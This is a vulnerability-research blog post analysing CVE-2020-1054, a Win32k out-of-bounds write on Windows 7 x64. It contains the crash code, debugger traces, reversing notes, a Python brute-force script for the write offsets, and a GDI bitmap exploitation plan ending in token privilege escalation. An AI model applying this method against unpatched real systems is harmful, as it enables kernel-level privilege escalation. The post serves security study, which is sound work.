CVE-2020-1054 Analysis
This post is an analysis of the May 2020 security vulnerability identified by CVE-2020-1054. The bug is an elevation of privilege in Win32k. The bug was reported by Netanel Ben-Simon and Yoav Alon from Check Point Research as well as bee13oy of Qihoo 360 Vulcan Team. I highly recommend viewing Netanel and Yoav’s talk from OffensiveCon20 Bugs on the Windshield: Fuzzing the Windows Kernel, which provides insight into how they found this and other bugs.
The remainder of this post will follow the steps I took to analyze the bug and write a proof of concept exploit targeting Windows 7 x64 (fully patched until Microsoft stopped supporting it).
The Crash
Netanel and Yoav kindly provided crash code. This code was a great starting point and I did not do any patch diffing. Patch diffing can still be very useful under these circumstances, however I found it unnecessary in this case.
The provided crash code:
int main(int argc, char *argv[])
{
LoadLibrary("user32.dll");
HDC r0 = CreateCompatibleDC(0x0);
// CPR's original crash code called CreateCompatibleBitmap as follows
// HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);
// however all following calculations/reversing in this blog will
// generally use the below call, unless stated otherwise
// this only matters if you happen to be following along with WinDbg
HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);
SelectObject(r0, r1);
DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc,
0x0, 0x0, 0x6);
return 0;
}
Reviewing the documentation for CreateCompatibleBitmap and DrawIconEx is suggested.
My first step was to rewrite the code in Rust and run it on a Windows 7 x64 box. Below is a snippet of the WinDbg bugcheck analysis:
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: fffff904c7000240, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff960000a5482, If non-zero, the instruction address which referenced
the bad memory address.
Arg4: 0000000000000005, (reserved)
Some register values may be zeroed or incorrect.
rax=fffff900c7000000 rbx=0000000000000000 rcx=fffff904c7000240
rdx=fffff90169dd8f80 rsi=0000000000000000 rdi=0000000000000000
rip=fffff960000a5482 rsp=fffff880028f3be0 rbp=0000000000000000
r8=00000000000008f0 r9=fffff96000000000 r10=fffff880028f3c40
r11=000000000000000b r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po cy
win32k!vStrWrite01+0x36a:
fffff960`000d5482 418b36 mov esi,dword ptr [r14] ds:00000000`00000000=????????
STACK_TEXT:
nt!RtlpBreakWithStatusInstruction
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x722
nt!KeBugCheckEx+0x104
nt!MmAccessFault+0x736
nt!KiPageFault+0x35c
win32k!vStrWrite01+0x36a
win32k!EngStretchBltNew+0x171f
win32k!EngStretchBlt+0x800
win32k!EngStretchBltROP+0x64b
win32k!BLTRECORD::bStretch+0x642
win32k!GreStretchBltInternal+0xa43
win32k!BltIcon+0x18f
win32k!DrawIconEx+0x3b7
win32k!NtUserDrawIconEx+0x14d
nt!KiSystemServiceCopyEnd+0x13
USER32!ZwUserDrawIconEx+0xa
USER32!DrawIconEx+0xd9
cve_2020_1054!CACHED_POW10 <PERF> (cve_2020_1054+0x106d)
The crash happens at win32k!vStrWrite01+0x36a
on the instruction mov esi,dword ptr [r14]
. Setting a breakpoint on this instruction yields the following:
It is clear that the crash occurs due to an invalid memory reference. This matches the WinDbg bugcheck analysis. CheckPoint Research tweeted about this vulnerability, describing it as an out-of-bounds (OOB) write.
I will work under the assumption that this value (fffff904'c7000240
in the crash) is what can be controlled for the OOB write.
Note that the value c7000240
will be continually referenced to throughout the blog post. This value changes across system reboots and sometimes per program execution, however for the sake of continuity will remain the same.
Controlling OOB Write
The first goal is to understand how the address fffff904'c7000240
can be controlled, which will be referred to as oob_target
. To accomplish this, the relevant parts of vStrWrite01
need to be reversed. Working backwards from mov esi,dword ptr [r14]
, r14
is set with lea r14, [rcx + rax*4]
:
Working further backwards rcx
is initialized in one of the first basic blocks of vStrWrite01
.
After that, rcx
is manipulated in a loop:
rcx
is added to by a constant value in the loop. Looking at the assembly this is add ecx, eax
. A psuedo-code loop snippet:
var_64h = 0x7fffffff;
var_6ch = 0x80000000;
while ( r11d )
{
--r11d;
if ( ebp >= var_6ch && ebp < var_6ch )
{
// oob read/write in here
}
++ebp;
ecx += eax;
}
With this information a rough formula arises for oob_target
:
oob_target = initial_value + loop_iterations * eax
The next logical step is to determine what controls the number of loop iterations. Reviewing the assembly, ebp
is set via the following instructions:
mov rsi, rcx // rcx is still arg0 here
...
mov ebp, [rsi]
ebp
is set to the first dword of arg0 of vStrWrite01
. Dumping the content of rcx
at the top of vStrWrite01
:
win32k!vStrWrite01:
fffff960`00165118 4885d2 test rdx,rdx
kd> dd rcx L2
fffff900`c4c76eb0 fff2aaab 0006aaab
fff2aaab
is not identical, but it gives the feeling that it is related to arg5 of DrawIconEx
. Changing the value from 0xfebffffc
to 0xfebffffd
:
win32k!vStrWrite01:
fffff960`00165118 4885d2 test rdx,rdx
kd> dd rcx L2
fffff900`c2962eb0 fff2aaac 0006aaaa
The result is fff2aaac
. This indicates that it is related.
Altering arg5 and observing the changes to oob_target
provides additional insight.
If arg5 = 0xff000000
there is a minor change to oob_target
:
win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c cmp ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff903`c7000240 ????????`???????? ????????`????????
If arg5 = 0xfd00000
there is a major change to oob_target
:
win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c cmp ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff90a`c7000240 ????????`???????? ????????`????????
Interestingly, no matter the value of arg5 the lower 32 bits of oob_target
remains c7000240
. Additionally, a decrease in the value of arg5 (treating as unsigned) results in an increase in oob_target
.
eax
in the oob_target
formula is set via an offset from r15
:
Offsets from r15
are commonly used in the beginning of vStrWrite01
. This indicates that r15
could contain the address to some structure. In the second basic block of the function r15
is set as follows:
mov r15, r8 // r8 is still arg2 here
r15
is set to arg2 of vStrWrite01
. Dumping arg2 at the start of the function:
The two red boxes mark values that are known. The first red box is arg1 (bitmap width 0x51500) and arg2 (bitmap height 0x100) passed to CreateCompatibleBitmap
. The second red box marks a value, c7000240
, that has been seen multiple times. This is the lower 32 bits of oob_target
. Lastly, the blue box marks eax
in the oob_target
formula.
The above memory layout within the context of Win32k bitmaps may look familiar, and indeed it is two adjecent structures, BASEOBJECT and SURFOBJ, that are well known in Windows kernel exploit development. In other words, the first red box is SURFOBJ.sizlBitmap, the second red box is SUFOBJ.pvScan0, and the blue box is SURFOBJ.lDelta. More information on these structures is available here. This is a critical piece of information that will be utilized later.
The next step, however, is to fully understand how iterations
from the oob_target
formula is controlled via arg5 of DrawIconEx
.
Determining this information follows a similar process as used above, but with additional steps. For this reason, only the results will be shared. The relevant function, vInitStrDDA
in the notes.txt file of my GitHub repo contains extra detail.
DrawIconEx
arg5’s control of loop_iterations
is determined by the following formula (written in Python):
# arg5 of DrawIconEx()
arg5 = 0xffb00000
# arg1 of CreateCompatibleBitmap()
arg1 = 0x51500
loop_iterations = ((1 - arg5) & 0xffffffff) // 0x30
lDelta = arg1 // 8
oob = loop_iterations * lDelta
upper32_inc = oob & 0xffffffff00000000
print("loop_iterations = %x" % loop_iterations)
print("lDelta = %x" % lDelta)
print("upper 32 inc. = %x" % upper32_inc)
What was discovered was that arg1 of CreateCompatibleBitmap
and arg5 of DrawIconEx
directly control the values of both loop_iterations
and lDelta
.
However, the lower 32 bits of oob_target
always remain the same. This means only the upper 32 bits of the write address are controllable.
The next step is to determine what is written and to what extent it can be controlled. Reviewing the assembly of vStrWrite01
two writes can be performed:
// write 1
win32k!vStrWrite01+0x417
mov dword ptr [r14],esi
// write 2
win32k!vStrWrite01+0x461
mov dword ptr [r14],esi
The content of esi
is determined by either of the following:
esi
is either bitwise OR’d or bitwise AND’d with some value.
Running the crash code calls DrawIconEx
as:
DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc,
0x0, 0x0, 0x6);
Using this call to DrawIconEx
the path to the bitwise AND is always taken. Because esi
is set via bitwise operations, the diFlags
(arg8) parameter of the DrawIconEx
stands out to me.
The current call sets this parameter to 0x6
. Reviewing the documentation for this flag shows that 0x6
is equivalent to DI_IMAGE
which “Draws the icon or cursor using the image”.
The flag DI_MASK
sounds promising, and sure enough setting diFlags
(arg8) to 0x1
changes execution flow to the OR branch.
Exploitation Strategy
Now that the capabilities of the OOB write are understood it is time to develop an exploitation strategy. The capabilites are a far cry from an all powerful write-what-where, however in situations like these I like to recall that it is possible to exploit a single byte NULL overflow.
At this point I strongly suggest reviewing/reading Abusing GDI Reloaded and Abusing GDI for ring0 exploit primitives. A brief explanation of these papers follows.
The SURFOBJ struct contains useful members such as pvScan01
and sizlBitmap
. pvScan01
points to the actual bitmap data. This data can be read/written to using GetBitmapBits
and SetBitMapBits
. sizlBitMap
is two dwords that contain the height and width of the bitmap. Clasically, two SURFOBJ structures are utilized. A write-what-where is used to overwrite the first SURFOBJ’s (referred to as Manager) pvScan01
with the value of the second SURFOBJ’s (referred to as Worker) pvScan01
address. This then allows a reusable/relocatable write-what-where primitive.
The capabilities of this OOB write are listed as:
what is a value either bitwise OR'd or AND'd
where is a value >= fffff901'c7000240
Obviously this does not meet the classical requirements. Fortunately, there is another option taking advantage of sizlBitmap
.
On Windows 7 (and older versions of Windows 10) the SURFOBJs and their pvScan01
member contents are laid out contiguously.
This means that if it is possible to increase either the width or height of sizlBitmap
it will be possible to write out-of-bounds of the SURFOBJ’s pvScan01
using a call to SetBitMapBits
.
If a second SURFOBJ is allocated after the first SURFOBJ, this object’s pvScan01
address can be overwritten. This second SURFOBJ can then be used via SetBitMapBits
for a powerful write-what-where primitive.
Taking all the information learned up to this point a rough exploitation strategy can be formulated.
1. Allocate a base bitmap (fffff900'c700000).
2. Allocate enough SURFOBJs (via calls to CreateCompatibleBitmap) such that
one is allocted at fffff901'c7000000.
2.1. A second is allocated directly after the first.
2.2. A third is allocated directly after the second.
2. Calculate loop_iterations*lDelta such that it is equal to fffff901'c7000240.
3. Use OOB write to overwrite width or height of second SURFOBJ's sizlBitmap.
4. Use SetBitMapBits with second SURFOBJ to overwrite pvScan01 of third SURFOBJ.
5. Arbitrary reusable write is now obtained.
6. Typical EoP overwrite process token privileges and inject into winlogon.exe.
A bad visual represenation:
Every step is easily accomplished with the exception of step 3. The ‘what’ part of the write is not a problem. As seen earlier it is possible to perform a bitwise OR.
This is guaranteed to increase the OR’d value, which is what is required.
Accurately targeting width or height of sizlBitmap
is the challenge.
It may be recalled in the start of the blog post oob_target
is set via lea r14, [rcx + rax*4]
.
Up to this point, rax
has been ignored. Now that an attack strategy is created, it is time to see how rax
can be controlled to grant greater control of the OOB write.
Testing different parameters of DrawIconEx
revealed that arg1 determines the value of rax
. rax
is then divided by 0x20
:
This provides the ability to set an offset from the start of the lower 32 bits where
offset = (arg1 // 0x20 ) * 0x4 + 0x240
Testing arguments to DrawIconEx
with breakpoints on both mov dword ptr [r14],esi
instructions also uncovered useful information.
arg2 of DrawIconEx
controls the number of iterations through a loop where writes are performed on the bitmap data. For example, if 0x5
is passed as arg2, then 0x5
sets of writes are executed:
The difference between sets of writes is equivalent to an earlier variable, lDelta
. This can be written in psuedo code as:
intial_value = 0xfffff901`c7000240 + (arg1 // 0x20) * 0x4;
loop_count = 0;
while(arg2)
{
write_location_1 = intial_value + lDelta * loop_count;
write location_2 = write_location_1 + 4;
--arg2;
++loop_count;
}
Effectively, three values need to be solved for such that at some point through the loop write_location_1
and write_location_2
land on surfobj1’s csizlBitmap
.
The three values are arg1, arg2 and lDelta
(width of bitmap // 8).
This can be bruteforced with ugly Python:
print("bruting function arguments...")
# start with size at 0x50000
for size in range(0x50000, 0xffffff):
lDelta = size // 0x8
# lDelta is always byte alligned so ignore if not
if lDelta & 0x0f == 0:
for arg1 in range(0x0, 0xfff, 0x20):
offset = (arg1 // 0x20) * 0x4 + 0x240
for arg2 in range(0x0,0x10):
write_target = offset + arg2 * lDelta
if write_target == 0x70038:
print("found: size {:x}, offset (arg1) {:x}, lDelta {:x}, \
loop_count (arg2) {:x}".format(size, arg1, lDelta, arg2))
Now that all values are understood, all that remains is to write the exploit code.
Exploitation Code
Exploitation code is available on my GitHub. Demoing the exploit:
Windows 7 KB
Testing the exploit on Windows 7 has proved to be very reliable. However, there is room for improvment to make memory calculations completely generic.
While testing, I found that a certain Windows KB modified the SURFOBJ struct slightly. Essentially, instead of the offset being 0x240
it is 0x238
.
Within the exploit code are 2 comments that mark what value to use depending if the Windows 7 host is pre- or post-KB.
I have narrowed down the KBs and will update with the exact KB later.
Thanks to Netanel Ben-Simon, Yoav Alon and bee130y for finding the bug: